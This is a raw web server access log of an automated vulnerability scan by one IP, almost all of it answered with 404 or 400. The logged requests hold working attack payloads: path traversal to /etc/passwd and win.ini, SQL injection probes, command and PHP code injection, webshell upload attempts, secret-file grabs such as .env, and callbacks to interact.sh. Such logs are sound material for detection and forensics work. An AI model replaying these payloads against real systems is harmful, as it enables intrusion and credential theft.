205.185.122.202 - - [19/Oct/2025:21:05:19 +0530] "GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/tmp!/glwuyqyhuxzpcuhvru HTTP/1.1" 404 1198
205.185.122.202 - - [19/Oct/2025:21:05:19 +0530] "GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/tmp!/glwuyqyhuxzpcuhvru HTTP/1.1" 404 1216
205.185.122.202 - - [19/Oct/2025:21:05:20 +0530] "GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(204470702),0x7e),1)--+ HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:05:21 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:05:22 +0530] "GET /css_parser.php?css=css_parser.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:05:23 +0530] "GET /ecp/mzcjc.js HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:05:24 +0530] "POST /UploadFileData?action=upload_file&filename=../.plvjet.jsp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:05:25 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:05:25 +0530] "POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:05:27 +0530] "GET /api/settings/values HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:05:27 +0530] "GET /api/components/search_projects HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:05:28 +0530] "GET /forum.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:05:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:05:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:05:30 +0530] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:05:32 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:05:34 +0530] "POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:05:36 +0530] "GET /devices.inc.php?search=True&searchField=antani'+union+select+md5('ioyux'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:05:38 +0530] "GET /configurations HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:05:41 +0530] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:05:42 +0530] "GET /events/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:05:44 +0530] "GET /mobile/plugin/1/ofsLogin.jsp?syscode=syscode×tamp=2&gopage=3&receiver=test&loginTokenFromThird= HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:05:45 +0530] "GET /.env HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:05:47 +0530] "GET /index.php/index/download/index?name=passwd&url=../../application/database.php HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:05:48 +0530] "GET /index.php/index/download/index?name=passwd&url=../../../../../../../etc/passwd HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:05:48 +0530] "GET /index.php/index/download/index?name=win.ini&url=../../../../../../../windows/win.ini HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:05:49 +0530] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:05:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:05:53 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:05:57 +0530] "GET /request_para.cgi?parameter=wifi_info HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:05:58 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:05:59 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:06:03 +0530] "POST /debug/pyspidervulntest/run HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:06:05 +0530] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:06:07 +0530] "GET /UserSelect/main.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:06:09 +0530] "PUT /api/users HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:06:11 +0530] "GET /getFavicon?host=interact.sh/? HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:06:12 +0530] "GET /new/newhttp:/interact.sh HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:06:13 +0530] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:06:15 +0530] "GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/tmp!/otnbvnlqesggdzctmh HTTP/1.1" 404 1198
205.185.122.202 - - [19/Oct/2025:21:06:15 +0530] "GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/tmp!/otnbvnlqesggdzctmh HTTP/1.1" 404 1216
205.185.122.202 - - [19/Oct/2025:21:06:16 +0530] "GET /admin/sql?query=SELECT%20md5(203095222) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:06:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:06:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:06:20 +0530] "GET /ecp/aplss.js HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:06:22 +0530] "POST /api/user/reg HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:06:33 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:06:51 +0530] "GET /api/settings/values HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:06:51 +0530] "GET /api/components/search_projects HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:06:53 +0530] "GET ///////../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:06:53 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:06:54 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:06:57 +0530] "GET /api/v1/canal/config/1/1 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:06:58 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:07:07 +0530] "GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:07:09 +0530] "GET /devices.inc.php?search=True&searchField=antani'+union+select+md5('iexuf'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:07:12 +0530] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27cat+/etc/passwd%27%29%2b%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:07:12 +0530] "GET /index.php/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27cat+/etc/passwd%27%29%2b%27 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:07:13 +0530] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:07:14 +0530] "GET /cgi-bin/popen.cgi?command=1;expr%20968959813%20%2b%20897215329&v= HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:07:15 +0530] "GET /mobile/plugin/1/ofsLogin.jsp?syscode=syscode×tamp=2&gopage=3&receiver=test&loginTokenFromThird= HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:07:17 +0530] "GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:07:18 +0530] "GET /index.php/index/download/index?name=passwd&url=../../application/database.php HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:07:18 +0530] "GET /index.php/index/download/index?name=passwd&url=../../../../../../../etc/passwd HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:07:19 +0530] "GET /index.php/index/download/index?name=win.ini&url=../../../../../../../windows/win.ini HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:07:20 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:07:21 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:07:24 +0530] "GET /install/ HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:07:26 +0530] "GET /request_para.cgi?parameter=wifi_info HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:07:29 +0530] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:07:30 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:07:30 +0530] "POST /debug/pyspidervulntest/run HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:07:33 +0530] "POST /login/verify HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:07:34 +0530] "GET /UserSelect/main.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:07:36 +0530] "GET /console/images/%252E./console.portal HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:07:36 +0530] "GET /getFavicon?host=interact.sh/? HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:07:38 +0530] "GET /services/user/values.xml?var=STATUS HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:07:39 +0530] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:07:41 +0530] "GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:07:42 +0530] "GET /admin/sql?query=SELECT%20md5(205082071) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:07:43 +0530] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:07:44 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:07:46 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:07:46 +0530] "POST /api/user/reg HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:07:48 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:07:49 +0530] "POST /node/?_format=hal_json HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:07:52 +0530] "GET /wp-json/ssa/v1/users HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:07:53 +0530] "GET ///////../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:07:56 +0530] "POST /plugin/LiveChat/getChat.json.php HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:07:58 +0530] "GET /api/v1/canal/config/1/1 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:07:59 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:08:00 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:08:01 +0530] "GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:08:03 +0530] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 404 1124
205.185.122.202 - - [19/Oct/2025:21:08:04 +0530] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27cat+/etc/passwd%27%29%2b%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:08:04 +0530] "GET /index.php/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27cat+/etc/passwd%27%29%2b%27 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:08:06 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:08:07 +0530] "GET /cgi-bin/popen.cgi?command=1;expr%20883314165%20%2b%20956045815&v= HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:08:08 +0530] "GET /env HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:08:09 +0530] "GET /actuator/env HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:08:09 +0530] "GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:08:11 +0530] "GET /mobile/dbconfigreader.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:08:12 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:08:14 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:08:15 +0530] "GET /install/ HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:08:18 +0530] "GET /configurations HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:08:20 +0530] "GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:08:20 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:08:22 +0530] "POST /api.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:08:23 +0530] "POST /login/verify HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:08:26 +0530] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:08:26 +0530] "GET /console/images/%252E./console.portal HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:08:29 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:08:30 +0530] "GET /services/user/values.xml?var=STATUS HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:08:32 +0530] "POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=vzmm.jsp&_ZQA_ID= HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:08:34 +0530] "GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:08:36 +0530] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:08:37 +0530] "POST /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:08:41 +0530] "GET /images/lists?cid=1 null" 400 -
205.185.122.202 - - [19/Oct/2025:21:08:42 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:08:46 +0530] "GET /inc/expired.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:08:47 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:08:49 +0530] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C%3Fphp%20printf(md5(2113))%3B%3F%3E HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:08:50 +0530] "GET /wp-json/ssa/v1/users HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:08:52 +0530] "POST /client.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:08:54 +0530] "POST /plugin/LiveChat/getChat.json.php HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:08:57 +0530] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:08:58 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:08:58 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:08:59 +0530] "GET /assets/something/services/AppModule.class HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:09:00 +0530] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 404 1124
205.185.122.202 - - [19/Oct/2025:21:09:03 +0530] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(207556337)) HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:09:04 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:08 +0530] "GET /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:21:09:09 +0530] "GET /env HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:09:09 +0530] "GET /actuator/env HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:09:12 +0530] "GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:09:12 +0530] "GET /mobile/dbconfigreader.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:09:14 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:15 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:09:18 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:19 +0530] "GET /configurations HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:09:23 +0530] "POST /ca/rest/certrequests HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:09:23 +0530] "POST /api.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:09:26 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:27 +0530] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:09:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:09:29 +0530] "GET /wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(6)+ELSE+5+END) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:09:30 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:09:30 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:31 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:32 +0530] "POST /index.php?m=member&f=login_save HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:33 +0530] "POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=prcb.jsp&_ZQA_ID= HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:09:35 +0530] "POST /cu.html HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:09:36 +0530] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:38 +0530] "GET /api/v1/GetSrc HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:09:38 +0530] "GET /api/v1/GetDevice HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:09:38 +0530] "GET /api/v1/GetUserInfo?user=admin&session= HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:09:39 +0530] "GET /images/lists?cid=1 null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:41 +0530] "GET /login.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:42 +0530] "GET /inc/expired.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:09:43 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:09:44 +0530] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C%3Fphp%20printf(md5(8409))%3B%3F%3E HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:09:47 +0530] "GET /res/voice.html?id=../etc/passwd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:09:47 +0530] "GET /res/voice.html?id=../Windows/win.ini HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:09:49 +0530] "POST /client.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:50 +0530] "POST /index.php?s=/admin/public/login.html HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:52 +0530] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:54 +0530] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/rrkwux.svg.jsp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:09:55 +0530] "GET /assets/something/services/AppModule.class HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:09:57 +0530] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5(2093319406)),0) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:09:57 +0530] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(202074591)) HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:09:59 +0530] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:10:00 +0530] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:10:00 +0530] "GET /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:21:10:03 +0530] "GET /api/logout?redirect_to=xyz%0d%0axyz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:10:04 +0530] "GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:10:07 +0530] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+md5('enhha'),NULL,NULL+--+ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:10:08 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:12 +0530] "POST /action.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:10:14 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:17 +0530] "GET /api/snapshots/:key HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:10:18 +0530] "POST /ca/rest/certrequests HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:10:20 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:10:21 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:10:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:10:25 +0530] "GET /wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(6)+ELSE+5+END) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:10:25 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:27 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:10:27 +0530] "POST /index.php?m=member&f=login_save HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:10:29 +0530] "GET /resin-doc/;/WEB-INF/resin-web.xml HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:10:30 +0530] "POST /cu.html HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:10:32 +0530] "GET /wan.htm HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:10:33 +0530] "GET /api/v1/GetSrc HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:10:33 +0530] "GET /api/v1/GetDevice HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:10:34 +0530] "GET /api/v1/GetUserInfo?user=admin&session= HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:10:39 +0530] "GET /index.php/Home/uploadify/fileList?type=.+&path=../ HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:10:40 +0530] "GET /login.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:10:43 +0530] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:10:44 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:10:47 +0530] "POST /signin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:10:49 +0530] "GET /res/voice.html?id=../etc/passwd HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:10:49 +0530] "GET /res/voice.html?id=../Windows/win.ini HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:10:51 +0530] "GET /pma/ HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:10:52 +0530] "POST /index.php?s=/admin/public/login.html HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:10:54 +0530] "GET /Data/Log/19_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:10:55 +0530] "GET /Data/Log/20_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:10:55 +0530] "GET /Data/Log/21_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:10:55 +0530] "GET /Data/Log/22_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:10:55 +0530] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/jcnosy.svg.jsp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:10:58 +0530] "GET / HTTP/1.1" 200 11250
